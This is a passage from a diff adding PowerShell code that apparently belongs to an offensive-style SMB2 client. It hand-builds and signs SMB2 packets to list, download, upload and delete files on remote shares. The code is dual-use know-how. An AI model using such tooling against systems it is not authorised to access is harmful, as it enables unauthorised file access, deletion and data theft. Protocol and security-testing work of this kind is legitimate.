+ elseif($refresh)
+ {
+ Write-Output "[+] Session refreshed"
+ $SMB_client_stage = 'Exit'
+ }
+ elseif(!$SMB_IPC)
+ {
+ $SMB_share_path = "\\" + $Target + "\" + $Share
+ $SMB_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_share_path)
+ $SMB_IPC = $true
+ $SMB_client_stage = 'IoctlRequest'
+ }
+ else
+ {
+
+ if($Action -eq 'Put')
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ $create_request_extra_info = 2
+ }
+ else
+ {
+ $create_request_extra_info = 1
+ }
+
+ $SMB2_tree_ID = $SMB_client_receive[40..43]
+ $SMB_client_stage = 'CreateRequest'
+
+ if($Action -eq 'Get')
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ }
+
+ }
+
+ }
+
+ }
+
+ 'IoctlRequest'
+ {
+ $SMB2_tree_ID = 0x01,0x00,0x00,0x00
+ $SMB_ioctl_path = "\" + $Target + "\" + $Share
+ $SMB_ioctl_path_bytes = [System.Text.Encoding]::Unicode.GetBytes($SMB_ioctl_path) + 0x00,0x00
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x0b,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2IoctlRequest $SMB_ioctl_path_bytes
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+ $SMB2_tree_ID = 0x00,0x00,0x00,0x00
+ $SMB_client_stage = 'TreeConnect'
+ }
+
+ 'CreateRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CreateRequest $SMB2_file $create_request_extra_info $source_file_size
+
+ if($directory_list.Count -gt 0)
+ {
+ $packet_SMB2_data["DesiredAccess"] = 0x81,0x00,0x10,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ }
+
+ if($Action -eq 'Delete')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x00,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x80,0x00,0x00,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ }
+
+ 2
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x40,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x80,0x00,0x01,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ }
+
+ }
+
+ }
+
+ if($Action -eq 'Get')
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x00,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x89,0x00,0x12,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x05,0x00,0x00,0x00
+ }
+
+ if($Action -eq 'Put')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x60,0x00,0x20,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x89,0x00,0x12,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x01,0x00,0x00,0x00
+ $packet_SMB2_data["RequestedOplockLevel"] = 0xff
+ }
+
+ 1
+ {
+ $packet_SMB2_data["CreateOptions"] = 0x64,0x00,0x00,0x00
+ $packet_SMB2_data["DesiredAccess"] = 0x97,0x01,0x13,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x00,0x00,0x00,0x00
+ $packet_SMB2_data["RequestedOplockLevel"] = 0xff
+ $packet_SMB2_data["FileAttributes"] = 0x20,0x00,0x00,0x00
+ $packet_SMB2_data["CreateDisposition"] = 0x05,0x00,0x00,0x00
+ }
+
+ }
+
+ }
+
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if([System.BitConverter]::ToString($SMB_client_receive[12..15]) -ne '00-00-00-00')
+ {
+
+ $error_code = [System.BitConverter]::ToString($SMB_client_receive[12..15])
+
+ switch($error_code)
+ {
+
+ '03-01-00-c0'
+ {
+ $SMB_client_stage = 'Exit'
+ }
+
+ '22-00-00-c0'
+ {
+
+ if($directory_list.Count -gt 0)
+ {
+ $directory_list.RemoveAt(0) > $null
+ }
+ else
+ {
+ $output_message = "[-] Access denied"
+ $share_subdirectory_start = $false
+ }
+
+ $SMB_client_stage = 'CloseRequest'
+
+ }
+
+ '34-00-00-c0'
+ {
+
+ if($Action -eq 'Put')
+ {
+ $create_request_extra_info = 3
+ $action_step++
+ $SMB_client_stage = 'CreateRequest'
+ }
+ else
+ {
+ $output_message = "[-] File not found"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ 'ba-00-00-c0'
+ {
+
+ if($Action -eq 'Put')
+ {
+ $output_message = "[-] Destination filname must be specified"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ default
+ {
+ $error_code = $error_code -replace "-",""
+ $output_message = "[-] Create request error code 0x$error_code"
+ $SMB_client_stage = 'Exit'
+ }
+
+ }
+
+ }
+ elseif($Action -eq 'Delete' -and $action_step -eq 2)
+ {
+ $set_info_request_file_info_class = 0x01
+ $set_info_request_info_level = 0x0d
+ $set_info_request_buffer = 0x01,0x00,0x00,0x00
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'SetInfoRequest'
+ }
+ elseif($Action -eq 'Get' -and $action_step -ne 1)
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ 2
+ {
+
+ if($file_size -lt 4096)
+ {
+ $read_request_length = $file_size
+ }
+ else
+ {
+ $read_request_length = 4096
+ }
+
+ $read_request_offset = 0
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+
+ 4
+ {
+ $header_next_command = 0x68,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x01
+ $query_info_request_file_info_class_1 = 0x07
+ $query_info_request_output_buffer_length_1 = 0x00,0x10,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x68,0x00
+ $query_info_request_buffer_1 = 0
+ $query_info_request_info_type_2 = 0x01
+ $query_info_request_file_info_class_2 = 0x16
+ $query_info_request_output_buffer_length_2 = 0x00,0x10,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x68,0x00
+ $query_info_request_buffer_2 = 0
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $SMB_client_stage = 'QueryInfoRequest'
+ }
+
+ }
+
+ }
+ elseif($Action -eq 'Put')
+ {
+
+ switch($action_step)
+ {
+
+ 0
+ {
+
+ if($Action -eq 'Put')
+ {
+ $output_message = "Destination file exists"
+ $SMB_client_stage = 'CloseRequest'
+ }
+
+ }
+
+ 1
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $action_step++
+ $header_next_command = 0x70,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x02
+ $query_info_request_file_info_class_1 = 0x01
+ $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x00,0x00
+ $query_info_request_buffer_1 = 8
+ $query_info_request_info_type_2 = 0x02
+ $query_info_request_file_info_class_2 = 0x05
+ $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x00,0x00
+ $query_info_request_buffer_2 = 1
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'QueryInfoRequest'
+ }
+
+ }
+
+ }
+ elseif($share_subdirectory_start)
+ {
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'CloseRequest'
+ }
+ elseif($directory_list.Count -gt 0 -or $action_step -eq 1)
+ {
+ $SMB_client_stage = 'FindRequest'
+ }
+ else
+ {
+ $header_next_command = 0x70,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x02
+ $query_info_request_file_info_class_1 = 0x01
+ $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x00,0x00
+ $query_info_request_buffer_1 = 8
+ $query_info_request_info_type_2 = 0x02
+ $query_info_request_file_info_class_2 = 0x05
+ $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x00,0x00
+ $query_info_request_buffer_2 = 1
+ $SMB_file_ID = $SMB_client_receive[132..147]
+ $SMB_client_stage = 'QueryInfoRequest'
+
+ if($share_subdirectory)
+ {
+ $share_subdirectory_start = $true
+ }
+
+ }
+
+ }
+
+ 'QueryInfoRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2_header["NextCommand"] = $header_next_command
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2QueryInfoRequest $query_info_request_info_type_1 $query_info_request_file_info_class_1 $query_info_request_output_buffer_length_1 $query_info_request_input_buffer_offset_1 $SMB_file_ID $query_info_request_buffer_1
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2b_header = New-PacketSMB2Header 0x10,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2b_data = New-PacketSMB2QueryInfoRequest $query_info_request_info_type_2 $query_info_request_file_info_class_2 $query_info_request_output_buffer_length_2 $query_info_request_input_buffer_offset_2 $SMB_file_ID $query_info_request_buffer_2
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length) ($SMB2_data.Length + $SMB2b_data.Length)
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2b_header + $SMB2b_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2b_header["Signature"] = $SMB2_signature
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($share_subdirectory_start)
+ {
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ $root_directory = $SMB2_file + 0x5c,0x00
+ $create_request_extra_info = 1
+ $SMB_client_stage = 'CreateRequest'
+ }
+ elseif($Action -eq 'Get')
+ {
+
+ switch($action_step)
+ {
+
+ 5
+ {
+ $query_info_response = [System.BitConverter]::ToString($SMB_client_receive)
+ $query_info_response = $query_info_response -replace "-",""
+ $file_stream_size_index = $query_info_response.Substring(10).IndexOf("FE534D42") + 170
+ $file_stream_size = [System.BitConverter]::ToUInt32($SMB_client_receive[($file_stream_size_index / 2)..($file_stream_size_index / 2 + 8)],0)
+ $file_stream_size_quotient = [Math]::Truncate($file_stream_size / 65536)
+ $file_stream_size_remainder = $file_stream_size % 65536
+ $percent_complete = $file_stream_size_quotient
+
+ if($file_stream_size_remainder -ne 0)
+ {
+ $percent_complete++
+ }
+
+ if($file_stream_size -lt 1024)
+ {
+ $progress_file_size = "" + $file_stream_size + "B"
+ }
+ elseif($file_stream_size -lt 1024000)
+ {
+ $progress_file_size = "" + ($file_stream_size / 1024).ToString('.00') + "KB"
+ }
+ else
+ {
+ $progress_file_size = "" + ($file_stream_size / 1024000).ToString('.00') + "MB"
+ }
+
+ $header_next_command = 0x70,0x00,0x00,0x00
+ $query_info_request_info_type_1 = 0x02
+ $query_info_request_file_info_class_1 = 0x01
+ $query_info_request_output_buffer_length_1 = 0x58,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_1 = 0x00,0x00
+ $query_info_request_buffer_1 = 8
+ $query_info_request_info_type_2 = 0x02
+ $query_info_request_file_info_class_2 = 0x05
+ $query_info_request_output_buffer_length_2 = 0x50,0x00,0x00,0x00
+ $query_info_request_input_buffer_offset_2 = 0x00,0x00
+ $query_info_request_buffer_2 = 1
+ $action_step++
+ $SMB_client_stage = 'QueryInfoRequest'
+ }
+
+ 6
+ {
+
+ if($file_stream_size -lt 65536)
+ {
+ $read_request_length = $file_stream_size
+ }
+ else
+ {
+ $read_request_length = 65536
+ }
+
+ $read_request_offset = 0
+ $read_request_step = 1
+ $action_step++
+ $SMB_client_stage = 'ReadRequest'
+ }
+
+ }
+ }
+ elseif($Action -eq 'Put')
+ {
+ $percent_complete = $source_file_size_quotient
+
+ if($source_file_size_remainder -ne 0)
+ {
+ $percent_complete++
+ }
+
+ if($source_file_size -lt 1024)
+ {
+ $progress_file_size = "" + $source_file_size + "B"
+ }
+ elseif($source_file_size -lt 1024000)
+ {
+ $progress_file_size = "" + ($source_file_size / 1024).ToString('.00') + "KB"
+ }
+ else
+ {
+ $progress_file_size = "" + ($source_file_size / 1024000).ToString('.00') + "MB"
+ }
+
+ $action_step++
+ $set_info_request_file_info_class = 0x01
+ $set_info_request_info_level = 0x14
+ $set_info_request_buffer = [System.BitConverter]::GetBytes($source_file_size)
+ $SMB_client_stage = 'SetInfoRequest'
+ }
+ elseif($Action -eq 'Delete')
+ {
+ $SMB_client_stage = 'CreateRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'CreateRequestFindRequest'
+ }
+
+ }
+
+ 'SetInfoRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x11,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2SetInfoRequest $set_info_request_file_info_class $set_info_request_info_level $SMB_file_ID $set_info_request_buffer
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService $SMB2_header.Length $SMB2_data.Length
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($source_file_size -le 65536)
+ {
+ $write_request_length = $source_file_size
+ }
+ else
+ {
+ $write_request_length = 65536
+ }
+
+ $write_request_offset = 0
+ $write_request_step = 1
+
+ if($Action -eq 'Delete')
+ {
+ $output_message = "[+] File deleted"
+ $SMB_client_stage = 'CloseRequest'
+ $action_step++
+ }
+ elseif($Action -eq 'Put' -and $action_step -eq 4)
+ {
+ $output_message = "[+] File uploaded"
+ $SMB_client_stage = 'CloseRequest'
+ }
+ else
+ {
+ $SMB_client_stage = 'WriteRequest'
+ }
+
+ }
+
+ 'CreateRequestFindRequest'
+ {
+ $SMB2_message_ID++
+ $packet_SMB2_header = New-PacketSMB2Header 0x05,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2_header["Flags"] = 0x08,0x00,0x00,0x00
+ }
+
+ $packet_SMB2_data = New-PacketSMB2CreateRequest $SMB2_file 1
+ $packet_SMB2_data["DesiredAccess"] = 0x81,0x00,0x10,0x00
+ $packet_SMB2_data["ShareAccess"] = 0x07,0x00,0x00,0x00
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+ $packet_SMB2_header["NextCommand"] = [System.BitConverter]::GetBytes($SMB2_header.Length + $SMB2_data.Length)
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ $SMB2_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2_header + $SMB2_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2_header["Signature"] = $SMB2_signature
+ $SMB2_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2b_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2b_header["ProcessID"] = $process_ID_bytes
+ $packet_SMB2b_header["NextCommand"] = 0x68,0x00,0x00,0x00
+
+ if($SMB_signing)
+ {
+ $packet_SMB2b_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2b_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2b_data = New-PacketSMB2FindRequestFile 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff 0x00,0x00,0x00,0x00,0x00,0x00
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ $SMB2b_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_data
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2b_header + $SMB2b_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2b_header["Signature"] = $SMB2_signature
+ $SMB2b_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2b_header
+ }
+
+ $SMB2_message_ID++
+ $packet_SMB2c_header = New-PacketSMB2Header 0x0e,0x00 0x01,0x00 $SMB2_message_ID $SMB2_tree_ID $SMB_session_ID
+ $packet_SMB2c_header["ProcessID"] = $process_ID_bytes
+
+ if($SMB_signing)
+ {
+ $packet_SMB2c_header["Flags"] = 0x0c,0x00,0x00,0x00
+ }
+ else
+ {
+ $packet_SMB2c_header["Flags"] = 0x04,0x00,0x00,0x00
+ }
+
+ $packet_SMB2c_data = New-PacketSMB2FindRequestFile 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
+ $packet_SMB2c_data["OutputBufferLength"] = 0x80,0x00,0x00,0x00
+ $SMB2c_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_header
+ $SMB2c_data = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_data
+ $packet_NetBIOS_session_service = New-PacketNetBIOSSessionService ($SMB2_header.Length + $SMB2b_header.Length + $SMB2c_header.Length) ($SMB2_data.Length + $SMB2b_data.Length + $SMB2c_data.Length)
+ $NetBIOS_session_service = ConvertFrom-PacketOrderedDictionary $packet_NetBIOS_session_service
+
+ if($SMB_signing)
+ {
+ $SMB2_sign = $SMB2c_header + $SMB2c_data
+ $SMB2_signature = $HMAC_SHA256.ComputeHash($SMB2_sign)
+ $SMB2_signature = $SMB2_signature[0..15]
+ $packet_SMB2c_header["Signature"] = $SMB2_signature
+ $SMB2c_header = ConvertFrom-PacketOrderedDictionary $packet_SMB2c_header
+ }
+
+ $SMB_client_send = $NetBIOS_session_service + $SMB2_header + $SMB2_data + $SMB2b_header + $SMB2b_data + $SMB2c_header + $SMB2c_data
+ $SMB_client_stream.Write($SMB_client_send,0,$SMB_client_send.Length) > $null
+ $SMB_client_stream.Flush()
+ $SMB_client_stream.Read($SMB_client_receive,0,$SMB_client_receive.Length) > $null
+
+ if($Action -eq 'Delete')
+ {
+ $SMB_client_stage = 'CreateRequest'
+ $SMB2_file = [System.Text.Encoding]::Unicode.GetBytes($share_subdirectory)
+ $action_step++
+ }
+ else
+ {
+ $SMB_client_stage = 'ParseDirectoryContents'
+ }
+
+ }
+
+ 'ParseDirectoryContents'
+ {
+ $subdirectory_list = New-Object System.Collections.ArrayList
+ $create_response_file = [System.BitConverter]::ToString($SMB_client_receive)
+ $create_response_file = $create_response_file -replace "-",""
+ $directory_contents_mode_list = New-Object System.Collections.ArrayList
+ $directory_contents_create_time_list = New-Object System.Collections.ArrayList
+ $directory_contents_last_write_time_list = New-Object System.Collections.ArrayList
+ $directory_contents_length_list = New-Object System.Collections.ArrayList
+ $directory_contents_name_list = New-Object System.Collections.ArrayList
+
+ if($directory_list.Count -gt 0)
+ {
+ $create_response_file_index = 152
+ $directory_list.RemoveAt(0) > $null
+ }
+ else
+ {
+ $create_response_file_index = $create_response_file.Substring(10).IndexOf("FE534D42") + 154
+ }
+
+ do
+ {
+ $SMB_next_offset = [System.BitConverter]::ToUInt32($SMB_client_receive[($create_response_file_index / 2 + $SMB_offset)..($create_response_file_index / 2 + 3 + $SMB_offset)],0)
+ $SMB_file_length = [System.BitConverter]::ToUInt32($SMB_client_receive[($create_response_file_index / 2 + 40 + $SMB_offset)..($create_response_file_index / 2 + 47 + $SMB_offset)],0)
+ $SMB_file_attributes = [Convert]::ToString($SMB_client_receive[($create_response_file_index / 2 + 56 + $SMB_offset)],2).PadLeft(16,'0')
+
+ if($SMB_file_length -eq 0)
+ {
+ $SMB_file_length = $null
+ }
+
+ if($SMB_file_attributes.Substring(11,1) -eq '1')
+ {
+ $SMB_file_mode = "d"
+ }
+ else
+ {
+ $SMB_file_mode = "-"
+ }
+
+ if($SMB_file_attributes.Substring(10,1) -eq '1')
+ {
+ $SMB_file_mode+= "a"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ if($SMB_file_attributes.Substring(15,1) -eq '1')
+ {
+ $SMB_file_mode+= "r"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ if($SMB_file_attributes.Substring(14,1) -eq '1')
+ {
+ $SMB_file_mode+= "h"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ if($SMB_file_attributes.Substring(13,1) -eq '1')
+ {
+ $SMB_file_mode+= "s"
+ }
+ else
+ {
+ $SMB_file_mode+= "-"
+ }
+
+ $file_create_time = [Datetime]::FromFileTime([System.BitConverter]::ToInt64($SMB_client_receive[($create_response_file_index / 2 + 8 + $SMB_offset)..($create_response_file_index / 2 + 15 + $SMB_offset)],0))
+ $file_create_time = Get-Date $file_create_time -format 'M/d/yyyy h:mm tt'
+ $file_last_write_time = [Datetime]::FromFileTime([System.BitConverter]::ToInt64($SMB_client_receive[($create_response_file_index / 2 + 24 + $SMB_offset)..($create_response_file_index / 2 + 31 + $SMB_offset)],0))
+ $file_last_write_time = Get-Date $file_last_write_time -format 'M/d/yyyy h:mm tt'
+ $SMB_filename_length = [System.BitConverter]::ToUInt32($SMB_client_receive[($create_response_file_index / 2 + 60 + $SMB_offset)..($create_response_file_index / 2 + 63 + $SMB_offset)],0)
+ $SMB_filename_unicode = $SMB_client_receive[($create_response_file_index / 2 + 104 + $SMB_offset)..($create_response_file_index / 2 + 104 + $SMB_offset + $SMB_filename_length - 1)]
+ $SMB_filename = [System.BitConverter]::ToString($SMB_filename_unicode)
+ $SMB_filename = $SMB_filename -replace "-00",""
+
+ if($SMB_filename.Length -gt 2)
+ {
+ $SMB_filename = $SMB_filename.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $SMB_filename_extract = New-Object System.String ($SMB_filename,0,$SMB_filename.Length)
+ }
+ else
+ {
+ $SMB_filename_extract = [String][Char][System.Convert]::ToInt16($SMB_filename,16)
+ }
+
+ if(!$Modify)
+ {
+ $file_last_write_time = $file_last_write_time.PadLeft(19,0)
+ [String]$SMB_file_length = $SMB_file_length
+ $SMB_file_length = $SMB_file_length.PadLeft(15,0)
+ }
+
+ if($SMB_file_attributes.Substring(11,1) -eq '1')
+ {
+
+ if($SMB_filename_extract -ne '.' -and $SMB_filename_extract -ne '..')
+ {
+ $subdirectory_list.Add($SMB_filename_unicode) > $null
+ $directory_contents_name_list.Add($SMB_filename_extract) > $null
+ $directory_contents_mode_list.Add($SMB_file_mode) > $null
+ $directory_contents_length_list.Add($SMB_file_length) > $null
+ $directory_contents_last_write_time_list.Add($file_last_write_time) > $null
+ $directory_contents_create_time_list.Add($file_create_time) > $null
+ }
+
+ }
+ else
+ {
+ $directory_contents_name_list.Add($SMB_filename_extract) > $null
+ $directory_contents_mode_list.Add($SMB_file_mode) > $null
+ $directory_contents_length_list.Add($SMB_file_length) > $null
+ $directory_contents_last_write_time_list.Add($file_last_write_time) > $null
+ $directory_contents_create_time_list.Add($file_create_time) > $null
+ }
+
+ if($share_subdirectory -and !$share_subdirectory_start)
+ {
+ $root_directory_string = $share_subdirectory + '\'
+ }
+
+ $SMB_offset += $SMB_next_offset
+ }
+ until($SMB_next_offset -eq 0)
+
+ if($directory_contents_name_list)
+ {
+
+ if($root_directory_string)
+ {
+ $file_directory = $target_share + "\" + $root_directory_string.Substring(0,$root_directory_string.Length - 1)
+ }
+ else
+ {
+ $file_directory = $target_share
+ }
+
+ }
+
+ $directory_contents_output = @()
+ $i = 0
+
+ ForEach($directory in $directory_contents_name_list)
+ {
+ $directory_object = New-Object PSObject
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Name -Value ($file_directory + "\" + $directory_contents_name_list[$i])
+ Add-Member -InputObject $directory_object -MemberType NoteProperty -Name Mode -Value $directory_contents_mode_list[$i]
